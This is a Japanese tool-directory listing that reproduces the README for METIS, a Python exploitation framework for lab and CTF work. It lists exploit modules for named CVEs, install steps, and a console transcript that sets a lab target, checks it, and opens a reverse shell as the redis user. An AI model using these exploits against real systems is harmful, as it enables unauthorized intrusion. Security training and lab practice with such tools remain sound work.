Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
METIS — Metasploitスタイルのコンソール、自動登録されるExploitおよびAuxiliaryモジュール、トライステートチェック、ラボおよびCTFターゲット向けの複数のセッショントランスポートを備えたモジュラーPythonエクスプロイトフレームワーク。 | Kitploit
ツール/GitHubGitHub/k3ystr0k3r/metis
ペネトレーションテストフレームワーク脆弱性スキャナーエクスプロイトフレームワークエクスプロイトポストエクスプロイトCTFペネトレーションテストコマンド&コントロール学習と教育レッドチーミングリモートアクセスツールペイロード開発
32318時間45分前未レビュー
GitHubk3ystr0k3r/metis

METIS

Metasploitスタイルのコンソール、自動登録されるExploitおよびAuxiliaryモジュール、トライステートチェック、ラボおよびCTFターゲット向けの複数のセッショントランスポートを備えたモジュラーPythonエクスプロイトフレームワーク。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

METIS - Modular Exploitation & Threat Intelligence Framework

███╗   ███╗███████╗████████╗██╗███████╗
████╗ ████║██╔════╝╚══██╔══╝██║██╔════╝
██╔████╔██║█████╗     ██║   ██║███████╗
██║╚██╔╝██║██╔══╝     ██║   ██║╚════██║
██║ ╚═╝ ██║███████╗   ██║   ██║███████║
╚═╝     ╚═╝╚══════╝   ╚═╝   ╚═╝╚══════╝

学習用に構築された Python エクスプロイトフレームワーク。モジュラーアーキテクチャ、テーマ付きコンソール、複数のセッショントランスポート、そして成長を続ける CVE モジュールライブラリを備えています。


コミュニティ主導

METIS は コミュニティ主導のセキュリティリサーチフレームワークです。目標は、セキュリティ研究者、開発者、そしてより広いコミュニティによって提供されたモジュールのコレクションを成長させていくことです。

共有したい便利なスキャナ、補助モジュール、エクスプロイトモジュール、その他のセキュリティリサーチツールはありませんか? METIS に追加して Pull Request を開いてください。

プロジェクトのモジュール構造、コーディング標準、および認可された使用に関するガイドラインに従っている限り、すべてのコントリビューションを歓迎します。

新しい CVE モジュールの追加、既存モジュールの改善、バグ修正、新しいフレームワーク機能の構築など、あなたのコントリビューションは METIS をすべての人にとってより良いものにする助けになります。

独自のモジュール作成については、以下の モジュールの作成 を参照してください。


概要

METIS は Python で書かれたモジュラー型 C2/エクスプロイトフレームワークです。Metasploit スタイルの対話型コンソールを実行し、モジュールを選択し、オプションを設定し、チェックを実行し、ラボのターゲットに対してセッションを確立できます。

以下の用途向けに設計されています:

  • エクスプロイトフレームワークが内部でどのように動作するかを 学習 する
  • 脆弱な VM やコンテナに対する ラボ作業
  • スクリプト可能なフレームワークが手動ツールより高速な CTF 練習
  • カスタムモジュールやフレームワーク改善を通じた コミュニティコントリビューション

以下の用途向けには設計されていません:

  • 所有していない、またはテストの書面による許可を持たないシステムへの攻撃
  • 本番のレッドチームエンゲージメント(Cobalt Strike、Sliver、Mythic を使用してください)
  • 公開インターネット上のあらゆるもの

機能

  • モジュラーアーキテクチャ — .py ファイルを modules/ にドロップするだけで自動登録されます
  • 2 種類のモジュール — Exploit(セッションを生成)と Auxiliary(スキャナ、列挙ツール)
  • 三状態の check() — すべてのモジュールが攻撃前に検証できます(VULNERABLE / SAFE / UNKNOWN)
  • 複数のセッショントランスポート — リバースソケット、バインドソケット、paramiko チャネル、HTTP ウェブシェル、生の telnet
  • スレッド化されたスキャン — CIDR/カンマ区切りリスト/範囲/file: ターゲット指定とライブプログレスバー
  • テーマ付きコンソール — 22 種類の組み込みカラースキームとテーマごとのプログレスバーグラデーション
  • RC ファイル自動化 — ワークフロー全体をスクリプト化
  • モジュールごとの SOURCE ファイル — KEY=VALUE ファイルからオプションを読み込み
  • ローカルシェルエスケープ — フレームワークを離れずに任意のシェルコマンドを実行
  • リーンなコア — 意図的に最小限の依存関係と抽象化

モジュール

Auxiliary — スキャナと列挙ツール

モジュール説明
auxiliary/scanner/tcp_connectスレッド化された TCP ポートスキャナ
auxiliary/scanner/hikvision_cve_2017_7921Hikvision IP カメラ認証バイパス + ユーザー列挙
auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847MikroTik WinBox 認証情報漏洩
auxiliary/scanner/redis_cve_2022_0543Redis Lua サンドボックスエスケープ検出器

Exploits — セッション生成

モジュールセッションタイプ
exploit/unix/ftp/vsftpd_234_backdoorバインドソケット
exploit/multi/http/ghost_cms_handlebars_rceリバースソケット
exploit/multi/http/langflow_rce_cve_2026_9198リバースソケット
exploit/multi/http/budibase_plugin_upload_rce_cve_2026_31816リバースソケット
exploit/multi/http/activemq_jolokia_rce_cve_2026_34197リバースソケット
exploit/multi/http/tomcat_put_rce_cve_2017_12615リバースソケット
exploit/multi/http/joomla_jce_rce_cve_2026_48907HTTP ウェブシェル
exploit/linux/http/freepbx_sqli_rce_cve_2025_57819遅延リバース (cron)
exploit/linux/redis/redis_cve_2022_0543_rceリバースソケット
exploit/linux/ssh/libssh_auth_bypass_cve_2018_10933Paramiko チャネル
exploit/linux/telnet/inetutils_telnetd_bypass_cve_2026_24061生の telnet ソケット

インストール

Python 3.10+ と git が必要です。

git clone https://github.com/K3ysTr0K3R/METIS.git
cd METIS

python3 -m venv .venv
source .venv/bin/activate

pip install -r requirements.txt

requirements.txt:

pwntools>=4.11.0
requests>=2.31.0
paramiko>=3.0.0
redis>=5.0.0
cryptography>=42.0.0
rich>=13.7.0
prompt_toolkit>=3.0.43

実行:

python3 metis.py

使用方法

metis > show modules

  #    Module                                                        Date        Rank       Chk  Description
  --   ------------------------------------------------------------  ----------  ---------  ---  -----------
  1    auxiliary/scanner/hikvision_cve_2017_7921                     2017-09-23  normal     Yes  Hikvision IP Camera Authentication Bypass (CVE-2017-7921)
  2    auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847        2018-08-01  great      Yes  MikroTik WinBox Credential Leak (CVE-2018-14847)
  ...
  15   exploit/unix/ftp/vsftpd_234_backdoor                          2011-07-03  excellent  Yes  vsftpd 2.3.4 Backdoor Command Execution

metis > search redis

  #   Module                                       Date        Rank       Chk  Description
  --  ------                                       ----       ----       ---  -----------
  1   auxiliary/scanner/redis_cve_2022_0543        2022-02-18  excellent  Yes  Redis CVE-2022-0543 Scanner
  2   exploit/linux/redis/redis_cve_2022_0543_rce  2022-02-18  excellent  Yes  Redis CVE-2022-0543 Lua Sandbox Escape RCE

metis > use 2
[*] using exploit/linux/redis/redis_cve_2022_0543_rce
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set RHOST 192.168.56.101
[+] RHOST => 192.168.56.101
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set LHOST 192.168.56.1
[+] LHOST => 192.168.56.1
metis exploit(linux/redis/redis_cve_2022_0543_rce) > check
[*] check: probing 192.168.56.101:6379
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[*] check -> vulnerable
metis exploit(linux/redis/redis_cve_2022_0543_rce) > exploit
[*] running check() before exploit (AUTOCHECK=true)
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[+] target appears vulnerable — proceeding
[*] listening on 192.168.56.1:4444 for reverse shell
[+] shell from 192.168.56.101:51234
[+] new session: <Session a3f2b1c4 192.168.56.101:51234>

metis exploit(linux/redis/redis_cve_2022_0543_rce) > sessions
  a3f2b1c4  192.168.56.101:51234  (alive)

metis exploit(linux/redis/redis_cve_2022_0543_rce) > interact a3f2b1c4
[*] interacting with a3f2b1c4. 'background' returns, '!cmd' runs locally.
a3f2b1c4 $ id
uid=105(redis) gid=108(redis) groups=108(redis)
a3f2b1c4 $ background
metis >

一般的なコマンド

コマンド効果
show modulesメタデータ付きですべてのモジュールを一覧表示
search <term>パス、名前、説明、または CVE で検索
use <N|path>番号またはパスでモジュールを選択
set <OPT> <val>モジュールオプションを設定
setg <OPT> <val>グローバルオプションを設定(すべてのモジュールに適用)
checkモジュールの非破壊的な check() を実行
run / exploitモジュールを実行
sessionsアクティブなセッションを一覧表示
interact <sid>セッションに入る
connect <host> <port>バインドシェルに接続
listen <host> <port>生の TCP ハンドラを開始
resource <file.rc>RC ファイルからコマンドを実行
theme <name>テーマを切り替え(22 種類利用可能)
gradientプログレスバーのグラデーションを設定
!<cmd>ローカルシェルコマンドを実行
shell対話型ローカルシェルに入る
exit終了

ターゲット — RHOST と RHOSTS

補助スキャナには RHOSTS を使用します。以下を受け付けます:

set RHOSTS 192.168.56.101
set RHOSTS 192.168.56.101,192.168.56.102,10.0.0.5
set RHOSTS 192.168.56.0/24
set RHOSTS 192.168.56.100-192.168.56.120
set RHOSTS file:/path/to/targets.txt
ツールをダウンロード